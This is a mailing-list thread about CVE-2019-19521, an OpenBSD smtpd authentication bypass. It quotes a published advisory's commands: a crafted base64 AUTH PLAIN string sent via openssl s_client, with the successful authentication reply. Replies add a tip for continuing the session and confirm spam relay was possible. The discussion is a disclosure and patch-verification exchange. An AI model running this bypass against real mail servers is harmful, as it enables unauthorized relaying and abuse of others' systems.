Re: Exploit CVE-2019-19521?
Henry Jensen (2019-12-04 23:08 +0100): > $ openssl s_client -connect 192.168.56.121:25 -starttls smtp ... > I did verify, that this attack worked on my unpatched OpenBSD 6.6 Box. > But I didn't get much further. After the authentication succeeded > I continued with MAIL FROM: and RCPT TO: After the RCPT TO: the > connection was aborted. That is openssl s_client getting in your way. From the man page: When used interactively (which means neither -quiet nor -ign_eof have been given), the session will be renegotiated if the line begins with an R; if the line begins with a Q or if end of file is reached, the connection will be closed down. The workaround is to use lowercase commands.
Re: Exploit CVE-2019-19521?
On Wed, Dec 04, 2019 at 11:08:44PM +0100, Henry Jensen wrote: > Hi, > Hi, > from https://seclists.org/oss-sec/2019/q4/120 > > == > 1.2. Case study: smtpd > == > > To demonstrate how smtpd's authentication can be bypassed, we follow the > instructions from the manual page of smtpd.conf: > > [...] > > I did verify, that this attack worked on my unpatched OpenBSD 6.6 Box. > But I didn't get much further. After the authentication succeeded > I continued with MAIL FROM: and RCPT TO: After the RCPT TO: the > connection was aborted. After I patched my system I could no longer get > a 235 2.0.0 Authentication succeeded message > > Question is: would it have been possible in the "real world" to exploit > this to relay arbitrary messages (e.g. spam)? > Yes it would have been most definitely possible now if you have yourself relayed spam, I'll tell you that it's very unlikely this was used. -- Gilles Chehade @poolpOrg https://www.poolp.orgpatreon: https://www.patreon.com/gilles
Exploit CVE-2019-19521?
Hi, from https://seclists.org/oss-sec/2019/q4/120 == 1.2. Case study: smtpd == To demonstrate how smtpd's authentication can be bypassed, we follow the instructions from the manual page of smtpd.conf: -- In this second example, the aim is to permit mail delivery and relaying only for users that can authenticate (using their normal login credentials). ... listen on egress tls pki mail.example.com auth ... match auth from any for any action "outbound" -- and we restart smtpd. Then, with our remote-attacker hat on: -- $ printf '\0-schallenge\0whatever' | openssl base64 AC1zY2hhbGxlbmdlAHdoYXRldmVy $ openssl s_client -connect 192.168.56.121:25 -starttls smtp ... EHLO client.example.com ... AUTH PLAIN AC1zY2hhbGxlbmdlAHdoYXRldmVy 235 2.0.0 Authentication succeeded -- I did verify, that this attack worked on my unpatched OpenBSD 6.6 Box. But I didn't get much further. After the authentication succeeded I continued with MAIL FROM: and RCPT TO: After the RCPT TO: the connection was aborted. After I patched my system I could no longer get a 235 2.0.0 Authentication succeeded message Question is: would it have been possible in the "real world" to exploit this to relay arbitrary messages (e.g. spam)? Regards, Henry